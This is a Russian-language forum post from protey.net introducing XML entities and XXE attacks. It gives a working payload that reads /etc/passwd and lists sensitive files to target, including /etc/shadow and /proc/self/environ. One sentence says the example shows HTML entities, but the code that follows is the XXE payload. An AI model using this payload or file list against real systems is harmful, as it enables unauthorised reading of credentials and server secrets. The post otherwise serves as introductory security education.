Vander
Команда форума
- 10.11.2019
- 462
- 1 061
XML везде
XML-документы используются во многих форматах файлов. Вероятно, вы уже редактировали файл конфигурации, написанный в XML. Если вы создали веб-сайт, вы неизбежно отредактируете или увидите HTML. Вы также можете подумать о документах MS Office (.docx), масштабируемой векторной графике (.svg) и запросах SOAP. Широко реализованный в большинстве языков программирования, он является отличным выбором для взаимодействия. Стандарт XML описывает множество полезных функций форматирования, но мы собираемся сосредоточиться на «сущностях» из-за потенциальной уязвимости, которую они представляют.
Что такое XML-сущности?
Сущности XML - это ссылки на данные XML внутри документов XML. Мы упоминаем данные XML, потому что это может быть буквальная строка, теги XML или любой допустимый синтаксис XML, в который они вставлены.
Сущности в HTML используются для специальных символов:
Код:
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
Интересные файлы для чтения
passwd - это файл, который присутствует во всех операционных системах Linux.
- file:///etc/passwd
- file:///etc/shadow (Если повезёт)
- file:///etc/hosts
- file:///etc/resolv.conf
- file:///proc/self/net/dev : Include public and internal IP
- file:///proc/self/cwd/FILE: относительные пути, скорее всего, будут работать. file: /// proc / self / cwd / является альтернативой ./.
- file:///proc/self/cmdline: этот виртуальный файл возвращает команду и аргументы, используемые для запуска процесса.
- file:///proc/self/environ: среда, определенная в контексте текущего процесса.
- file:///proc/version
- file:///etc/lsb-release
- file:///etc/issue
- file:///dev/urandom & file:///dev/zero
Спасибо за внимание, материал подготовлен специально для protey.net